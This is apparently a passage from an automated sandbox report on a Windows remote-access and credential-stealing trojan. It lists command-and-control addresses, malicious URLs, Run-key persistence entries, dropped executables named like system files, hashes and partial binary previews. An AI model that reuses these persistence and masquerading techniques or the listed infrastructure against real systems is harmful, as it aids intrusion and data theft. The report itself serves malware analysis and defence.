00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp, msinto.exe, 0000000A.00000002.2389367064.0000000003149000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      37.44.238.250
                                      		664930cm.n9shka.topFrance
                                      		49434HARMONYHOSTING-ASFRtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1523119
                                      Start date and time:2024-10-01 05:56:06 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 36s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:36
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Zn0uX5K1ez.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:58509394a423edb98b0b1be7f18551ab.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.spyw.expl.evad.winEXE@44/294@1/1
                                      EGA Information:
                                      • Successful, ratio: 21.4%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target Zn0uX5K1ez.exe, PID 5492 because it is empty
                                      • Execution Graph export aborted for target conhost.exe, PID 2096 because it is empty
                                      • Execution Graph export aborted for target conhost.exe, PID 3212 because it is empty
                                      • Execution Graph export aborted for target explorer.exe, PID 3460 because there are no executed function
                                      • Execution Graph export aborted for target explorer.exe, PID 6076 because it is empty
                                      • Execution Graph export aborted for target explorer.exe, PID 7148 because it is empty
                                      • Execution Graph export aborted for target hPeZTHbzcsUskSflSyozwAqUA.exe, PID 3352 because it is empty
                                      • Execution Graph export aborted for target hPeZTHbzcsUskSflSyozwAqUA.exe, PID 6488 because it is empty
                                      • Execution Graph export aborted for target lsass.exe, PID 5972 because it is empty
                                      • Execution Graph export aborted for target lsass.exe, PID 6924 because it is empty
                                      • Execution Graph export aborted for target msinto.exe, PID 6244 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateFile calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      05:57:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUA "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
                                      05:57:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Recovery\lsass.exe"
                                      05:57:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                      05:57:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Windows\debug\explorer.exe"
                                      05:58:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe"
                                      05:58:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msinto "C:\blockhostnet\msinto.exe"
                                      05:58:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUA "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
                                      05:58:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Recovery\lsass.exe"
                                      05:58:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                      05:58:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Windows\debug\explorer.exe"
                                      05:58:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe"
                                      05:58:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msinto "C:\blockhostnet\msinto.exe"
                                      05:59:06AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUA "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
                                      05:59:15AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Recovery\lsass.exe"
                                      05:59:23AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                      23:57:30API Interceptor180753x Sleep call for process: conhost.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37.44.238.250VUZeEe6Nhz.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 779601cm.newnyash.top/ExternaleternalApiDefaultWindowsUniversaldownloads.php
                                      4LU843t3Vt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
                                      yQrCGtNgsf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 115583cm.n9shteam2.top/vmTo_authDbbaseTesttrackDatalifedownloads.php
                                      qDlkXj5kcZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 918938cm.n9shteam2.top/JspacketWindows.php
                                      C0laqZmkEf.exeGet hashmaliciousDCRatBrowse
                                      • 288583cm.n9shteam2.top/tohttppacketcpuBigloadProtectdbgeneratorlocal.php
                                      VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • seroi.top/imageSecurelowlongpollapisqllocal.php
                                      qM9xet97tX.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 272450cm.n9shteam2.top/eternalasync.php
                                      o2ymBtmuuW.exeGet hashmaliciousDCRatBrowse
                                      • seroi.top/imageSecurelowlongpollapisqllocal.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      HARMONYHOSTING-ASFRVUZeEe6Nhz.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      4LU843t3Vt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      yQrCGtNgsf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      qDlkXj5kcZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      C0laqZmkEf.exeGet hashmaliciousDCRatBrowse
                                      • 37.44.238.250
                                      VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      qM9xet97tX.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      o2ymBtmuuW.exeGet hashmaliciousDCRatBrowse
                                      • 37.44.238.250
                                      http://37.44.238.67/bins.shGet hashmaliciousMiraiBrowse
                                      • 37.44.238.67

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\Desktop\AEdPygqV.logVUZeEe6Nhz.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        KYwOaWhyl6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                            mElivBCOq1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              RqZ4ruld94.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                dvfpH6JJJC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  WR5wwWlTVi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                      TJWbSGBK0I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        povqqKBcoP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                          Created / dropped Files

                                                          C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\088424020bedd6

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (672), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):672
                                                          Entropy (8bit):5.896976137945206
                                                          Encrypted:false
                                                          SSDEEP:12:Eip9/uL2awwV8cKFPQtD+5tqC6GAZ4hEWoaU6qUMmgMcASx62qsQRG50aqgFGn:jp9IFVTaPQtmL5oaURuSIMG40qQn
                                                          MD5:FF809737DA1A6A433622FDB4B0012D14
                                                          SHA1:75E6A27D29385B41001B33644D257CFF63C6AFB2
                                                          SHA-256:1947840857313038F6FDD32C30D8B6DD8514426A8644BEB35E8F974BF9ADD399
                                                          SHA-512:9B35535BAF02BF6ABA70F28DAFD728AF8A001FAC9382E0C634DF9322916E68BA7C52454471ECC15463F7C73A1149342C33DF4B3FD386DCF5EE79BFAE27C697E1
                                                          Malicious:false
                                                          Preview:VnGrm2zjR3xGZAiElwzNnCNH2bLl8z8B9VjIybYX57LntDqEmV0swACSa8zLrNkc5vGEaZPJXbSp1kYyuH9n8QP8SRr0mNqrWtr77mnMGrUUsWbzjBakN7epgHvJrZgKvkTH2b0HdxhR54Q6z2QlwFeYPCaz1eeqKKiHDT6IKSGZaNtl1zUzJ5XqG420ABQ9T0GvWJ3f5Hbe8E8CSz8BJohOw2AIbGIIBHGjG8Pr6y4Bd3rC60hKDOzoT28dIuEz9Sc17Y6UjQFVufu3L7Mli7FwScQO9vjLtECLb0Fh3MlxJd3xHFSKidQBMpjeHsVyr3mqdjcV2orVWSnyidH4dYnQyA8vQkaL1wFQ0NThn7S3v4p4Bu6olaUSPW1dkqEROfdjMX7VJjRfFue3UEtgovkbbxAeV0663BoQbFrowkeBJzNe28Ig6hnc4CHZWd9TmUmEFNbPXFuDRjRmjfmWraAVXMWY8RRTlLYzMIYog3I0xjLVuez10mlMURq31DQFyacGKcaaG80yRJixABndcad8jMe5cfwdmDCWHEKSEYu2wx4Ks230ZxnX7dg87e8lLWLNGLq60VYDplMwRTMjm6DzapYohMUjaIqZlqEhM79EYjrWQuqnSY9OTWxbwBYoAyng4wLkPpXp79a07CXxfqRBJcGO3nuK

                                                          C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....

                                                          C:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1168
                                                          Entropy (8bit):4.448520842480604
                                                          Encrypted:false
                                                          SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                          MD5:B5189FB271BE514BEC128E0D0809C04E
                                                          SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                          SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                          SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                          Malicious:false
                                                          Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.9231632912207477
                                                          Encrypted:false
                                                          SSDEEP:48:6HmxtaxZ8RxeOAkFJOcV4MKe28drFxP2vqBHLuulB+hnqXSfbNtm:XlxvxVx9Lrevk9TkZzNt
                                                          MD5:6D9E08C3A279917AA147B3E56A0F96ED
                                                          SHA1:9E9481717CCFF188D7C2DE114B0FBBDF74A174DB
                                                          SHA-256:06E1BF3BB4E18C70060DC65D3FD94D9EE8DF83DE2C70F4D548043B5128E81072
                                                          SHA-512:64DC047746EF959DD64822B1147064E980D77841951B4153B20D4841B89681A81C57E9DBAFEE71547D2A76320924C1AD4CC736CCAAE7F100A390D05678A47A54
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.............................'... ...@....@.. ....................................@.................................`'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..8.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                          C:\Recovery\6203df4a6bafc7

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (624), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):624
                                                          Entropy (8bit):5.885518838465588
                                                          Encrypted:false
                                                          SSDEEP:12:kqJmdTU8CnnwE1LiiShdvHSkLsn/pWSmLChIbb7eRxNflt0hzHch:kaRwE1LiiId6kLmESmLChCb63NflMG
                                                          MD5:6A433C0409A853D38DD383A4D37C2992
                                                          SHA1:8BEDCECAD1F251F079E3D5D11AED95A682D4650D
                                                          SHA-256:6D2A50AA8B9061E5CFA5FD20EC9B2F873D88EE9D61E31791A9B2076E69220E3C
                                                          SHA-512:F0C811CC6747380711D1444FB998466A8D74213398811601FBD42175B71FEA9981B1E5D24033C09EFEDA5BBF4650841F2C91B7888F103C7297CF8E9113ED7C7D
                                                          Malicious:false
                                                          Preview:BURU66euolJTglXcq6rm5MGl5z4wj3NZSp9yKwR7J9g7LtDUxAxmYwrzOpYGBsKuXtB1miR4ptd5pIaLwk8jFlAg8KkeXK5azvkcsLsOs36oSvJFPMUbtkpvsf3b7xgeyCG4i7dl2u1MoVNMBfPK0erOGytNSQQ5Wb0QpPhStsj9sdHWRrachWoUU1xtNQTld6zMf6gw87bH4sfnrX5k0yXAxg6xbxEcZ7gwn41VKodk4gZmVKC0UsvojyY8AtUL28s6Mt9wgkaMUwFRGTcQuOIrM1Mzf2UbTSs6ycamLQUuRjUxsH2qQEao0BuUgJQnP92BDJdo30Fd3XZngZGYAnKP1EGwsFFBAqeRqStjoOxa87uclHxHD1nmznJ9Dq5xuDdN3I6Opgtw0tQ4TnLlR77IC2bCItg8S9p4dgidKjbgI1vGXOqZeTgxGUKBq3F69vd1DVbwEsargaALGVp3DHd8c2yIWhxQefhXY4CBx3Uw3yQpU94UOL22ReYKgSah5KNB3nxMSnGJxrFnmJyXncBSmoF3g2efdw1slPvrLsBlFsFkZuiXdD4cI4YPh4paIkqAzWCWXGL4aaN3jeewTHBa2Ykq0gJRCldeCFuCrL9W19Cs

                                                          C:\Recovery\lsass.exe

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                                          Download File
                                                          Process:C:\Windows\debug\explorer.exe
                                                          File Type:Unknown
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hPeZTHbzcsUskSflSyozwAqUA.exe.log

                                                          Download File
                                                          Process:C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
